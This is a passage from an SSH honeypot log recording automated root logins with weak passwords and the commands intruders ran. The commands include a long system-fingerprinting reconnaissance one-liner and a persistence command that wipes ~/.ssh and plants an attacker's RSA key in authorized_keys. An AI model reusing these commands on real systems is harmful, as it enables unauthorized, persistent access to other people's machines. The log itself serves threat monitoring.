      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
2.57.122.150
2026-06-30 16:46:25.583471 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123123

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: c22c321867e5
Client Version: SSH-2.0-Go
Engagement Duration: 1.3s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "c22c321867e5",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T16:46:25.583471Z",
  "end_time": "2026-06-30T16:46:26.845813Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123123"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:44:05.443857 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: ffaaf93a134e
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 0.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "ffaaf93a134e",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:44:05.443857Z",
  "end_time": "2026-06-30T16:44:06.383559Z",
  "duration": "0.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:44:03.085990 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 1cacaa0fe69c
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 2.2s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "1cacaa0fe69c",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:44:03.085990Z",
  "end_time": "2026-06-30T16:44:05.287576Z",
  "duration": "2.2",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:44:01.193253 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / ww123456.

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 7e431111528f
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 5.2s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "7e431111528f",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:44:01.193253Z",
  "end_time": "2026-06-30T16:44:06.380594Z",
  "duration": "5.2",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "ww123456."
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
2.57.122.150
2026-06-30 16:42:50.363476 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 111111

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 3f3be77fe727
Client Version: SSH-2.0-Go
Engagement Duration: 1.3s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "3f3be77fe727",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T16:42:50.363476Z",
  "end_time": "2026-06-30T16:42:51.641465Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "111111"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:41:16.259291 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 5aa0ee8869b1
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.0s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "5aa0ee8869b1",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:41:16.259291Z",
  "end_time": "2026-06-30T16:41:17.295477Z",
  "duration": "1.0",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:41:14.167282 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: fb19f4ddb2b0
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "fb19f4ddb2b0",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:41:14.167282Z",
  "end_time": "2026-06-30T16:41:16.108848Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:41:11.484770 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Ss@123456

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 0b8ad1892687
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 5.8s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "0b8ad1892687",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:41:11.484770Z",
  "end_time": "2026-06-30T16:41:17.290768Z",
  "duration": "5.8",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Ss@123456"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
